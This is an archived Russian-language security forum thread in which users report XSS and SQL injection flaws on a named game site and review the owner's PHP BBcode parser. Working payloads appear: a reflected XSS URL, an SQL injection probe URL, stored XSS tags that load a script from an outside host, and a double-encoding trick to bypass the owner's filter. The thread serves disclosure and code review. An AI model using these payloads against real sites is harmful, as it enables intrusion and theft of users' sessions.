ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
25.10.2007, 20:50
|
|
Новичок
Регистрация: 23.10.2007
Сообщений: 6
Провел на форуме:
293576
Репутация:
19
|
|
XSS
Код:
http://mu.gaming.su/index.php?page=comments&id=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E
быра исправляй  |
|
|
26.10.2007, 13:27
|
|
Участник форума
Регистрация: 02.04.2006
Сообщений: 273
Провел на форуме:
1269624
Репутация:
114
|
|
Там в коментах вобще можно было добиться sql-inj. Не одна переменная в коментах не фильтровалась.
Пофиксил!!!
|
|
|
|
26.10.2007, 14:04
|
|
Участник форума
Регистрация: 02.04.2006
Сообщений: 273
Провел на форуме:
1269624
Репутация:
114
|
|
Ди и еще что думаете по поводу вот такой реализации BBcode
PHP код:
function bbcode($text)
{
global $db_var;
$text = BBparseurls($text);
$text = " ".$text;
$bbcodes1 = array(
'$' => '$',
'[b]' => '<strong>',
'[/b]' => '</strong>',
'[p]' => '<p>',
'[/p]' => '</p>',
'[u]' => '<u>',
'[/u]' => '</u>',
'[i]' => '<em>',
'[/i]' => '</em>',
'[hr]' => '<hr />',
'[li]' => '<li>',
'[_]' => ' ',
'[__]' => ' ',
'[red]' => '<span style="color:#F93737">',
'[/red]' => '</span>',
'[white]' => '<span style="color:#FFFFFF">',
'[/white]' => '</span>',
'[green]' => '<span style="color:#09DD09">',
'[/green]' => '</span>',
'[blue]' => '<span style="color:#018BFF">',
'[/blue]' => '</span>',
'[orange]' => '<span style="color:#FF9900">',
'[/orange]' => '</span>',
'[yellow]' => '<span style="color:#FFFF00">',
'[/yellow]' => '</span>',
'[purple]' => '<span style="color:#A22ADA">',
'[/purple]' => '</span>',
'[black]' => '<span style="color:#000000">',
'[/black]' => '</span>',
'[grey]' => '<span style="color:#B9B9B9">',
'[/grey]' => '</span>',
'[pink]' => '<span style="color:#FFC0FF">',
'[/pink]' => '</span>',
'[sky]' => '<span style="color:#D1F4F9">',
'[/sky]' => '</span>',
'[sea]' => '<span style="color:#171A97">',
'[/sea]' => '</span>',
'[sub]' => '<sub>',
'[/sub]' => '</sub>',
'[sup]' => '<sup>',
'[/sup]' => '</sup>',
'[quote]' => '<blockquote><hr />',
'[/quote]' => '<hr /></blockquote>',
'[br]' => '<br />'
);
$links=explode('|',$db_var['link']);
$bbcodes2 = array(
'\\[img\\]([^\\\'\;\?([]*)\.(jpg|jpeg|gif|png)\\[/img\\]' => '<img src="\\1.\\2" alt="" />',
'\\[img=([^\\\'\;\?([]*)\.(jpg|jpeg|gif|png)\\]([^\\[]*)\.(jpg|jpeg|gif|png)\\[/img\\]' => '<a href="\\1.\\2"><img src="\\3.\\4" alt="" /></a>',
'\\[thumb=([^\\\'\;\?([]*)\.(jpg|jpeg|gif|png)\\]([^\\[]*)\.(jpg|jpeg|gif|png)\\[/thumb\\]' => ' <a href="pfs.php?m=view&v=\\3.\\4"><img src="\\1.\\2" alt="" /></a>',
'\\[t=([^\\\'\;\?([]*)\.(jpg|jpeg|gif|png)\\]([^\\[]*)\.(jpg|jpeg|gif|png)\\[/t\\]' => '<a href="\\3.\\4"><img src="\\1.\\2" alt="" /></a>',
'\\[url=([^\\\'\;([]*)\\]([^\\[]*)\\[/url\\]' => $links[0].'"\\1">\\2'.$links[1],
'\\[url\\]([^\\([]*)\\[/url\\]' => $links[0].'"\\1">\\1'.$links[1],
'\\[urlb=([^\\\'\;([]*)\\]([^\\[]*)\\[/urlb\\]' => '<a class="ll3" target="_blank" href="\\1">\\2</a>',
'\\[urlb\\]([^\\([]*)\\[/urlb\\]' => '<a class="ll3" target="_blank" href="\\1">\\1</a>',
'\\[color=([a-zA-Z]*|\#?[0-9a-fA-F]{6})\\]([^\\[]*)\\[/color\\]' => '<span style="color:\\1">\\2</span>',
'\\[class=([0-9a-zA-Z]{1,10})\\]([^\\[]*)\\[/class\\]' => '<span class="\\1">\\2</span>',
'\\[style=([1-9]{1})\\]([^\\[]*)\\[/style\\]' => '<span class="bbstyle\\1">\\2</span>',
'\\[size=([1-9]{1})\\]([^\\[]*)\\[/size\\]' => '<h\\1>\\2</h\\1>',
'\\[email=([._A-z0-9-]+@[_A-z0-9-]+\.[.a-z]+)\\]([^\\[]*)\\[/email\\]' => '<a href="mailto:\\1">\\2</a>',
'\\[email\\]([._A-z0-9-]+@[_A-z0-9-]+\.[.a-z]+)\\[/email\\]' => '<a href="mailto:\\1">\\1</a>',
'\\[user=([0-9]+)\\]([A-z0-9_\. ]+)\\[/user\\]' => '<a href="users.php?m=details&id=\\1">\\2</a>',
'\\[ac=([^\\[]*)\\]([^\\[]*)\\[/ac\\]' => '<acronym title="\\1">\\2</acronym>',
'\\[list=([a-zA-Z]*)\\]([^\\[]*)\\[/list\\]' => '<ul type="\\1">\\2</ul>',
'\\[list\\]([^\\[]*)\\[/list\\]' => '<ul>\\1</ul>',
'\\[icq\\]([1-9]{1,9})\\[/icq\\]' => '<a href="http://www.icq.com/\\1#pager"><img border=0 src="http://status.icq.com/online.gif?icq=\\1&img=5" alt="" /></a>',
'\\[quote=([^\\[]*)\\]' => '<blockquote>\\1<hr />',
'\\[colleft\\]([^\\[]*)\\[/colleft\\]' => '<div class="colleft">\\1</div>',
'\\[colright\\]([^\\[]*)\\[/colright\\]' => '<div class="colright">\\1</div>',
'\\[center\\]([^\\[]*)\\[/center\\]' => '<div style="text-align:center;">\\1</div>',
'\\[right\\]([^\\[]*)\\[/right\\]' => '<div style="text-align:right;">\\1</div>',
'\\[left\\]([^\\[]*)\\[/left\\]' => '<div style="text-align:left;">\\1</div>'
);
foreach($bbcodes1 as $bbcode => $bbcodehtml)
{ $text = str_replace($bbcode,$bbcodehtml,$text); }
foreach($bbcodes2 as $bbcode => $bbcodehtml)
{ $text = eregi_replace($bbcode,$bbcodehtml,$text); }
return(substr($text,1));
}
/* ------------------ */
function BBparseurls($text)
{
$text = ' '.$text;
$text = preg_replace("#([\n ])([a-z0-9]+?)://([^\t \n\r]+)#i", "\\1[urlb]\\2://\\3[/urlb]", $text);
$text = preg_replace("#([\n ])([a-z0-9]+?)://([^\t \n\r]+)#i", "\\1[url]\\2://\\3[/url]", $text);
$text = preg_replace("#([\n ])([a-z0-9-_.]+?@[A-z0-9-]+\.[^,\t \n\r]+)#i", "\\1[email]\\2[/email]", $text);
return(substr($text,1));
}
Нету тут нечего критического? |
|
|
|
04.01.2008, 21:51
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
В верхнем правом углу ссылка на регу ведёт на мертвую ссыль http://mu.gaming.su/register.html
|
|
|
|
04.01.2008, 22:28
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме:
1845062
Репутация:
1079
|
|
Сообщение от EST a1ien
Ди и еще что думаете по поводу вот такой реализации BBcode
Нету тут нечего критического?
Активные xss
Код:
[img]"style="display:none"><script src="http://site.ru/script.js"></script><img".jpg[/img]
[thumb=asdf.jpg]"style="display:none"><script src="http://site.ru/script.js"></script><img".jpg[/thumb]
[t=asdf.jpg]"style="display:none"><script src="http://site.ru/script.js"></script><img".jpg[/t]
Короче говоря там активные xss почти в каждом теге есть
Последний раз редактировалось Macro; 04.01.2008 в 22:38..
|
|
|
|
05.01.2008, 13:03
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
хм cервер off не успел, а была скуля:
http://mu.gaming.su/index.php?page=searchguild&guild=DarkS'/**/order/**/by/**/11+--+
ну вобщем там скуля налицо была, теперь вобще ничего не отображается
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 05.01.2008 в 13:11..
|
|
|
|
05.03.2008, 22:06
|
|
Участник форума
Регистрация: 02.04.2006
Сообщений: 273
Провел на форуме:
1269624
Репутация:
114
|
|
Ребята где вы их там нашли???? я эти баге на сайте и не нашел. Скуля там по определению быть не может! особенно того что ты пихал
Код:
if(isset($_GET['guild']))
{
$guild = $_GET['guild'];
if (eregi("[a-zA-Z0-9_-~/\%()=+><]", $guild))
{
Да и XSS не подтвердились. |
|
|
|
06.03.2008, 02:24
|
|
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028
Репутация:
2371
|
|
EST a1ien, все можно заменить на %XX , где хх допустим теже кавычки
%2527 подходит под твою регулярку
|
|
|
|
08.03.2008, 20:29
|
|
Участник форума
Регистрация: 02.04.2006
Сообщений: 273
Провел на форуме:
1269624
Репутация:
114
|
|
Ну заменить то можно. Но он пойдет как связка символов %27 тоесть в запросе будет %27 и все. Проверял. Или я вчемто не прав?
|
|
|
|
15.03.2008, 19:12
|
|
Banned
Регистрация: 03.08.2005
Сообщений: 430
Провел на форуме:
639191
Репутация:
60
|
|
под world of warcraft зделай дизайн =)
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
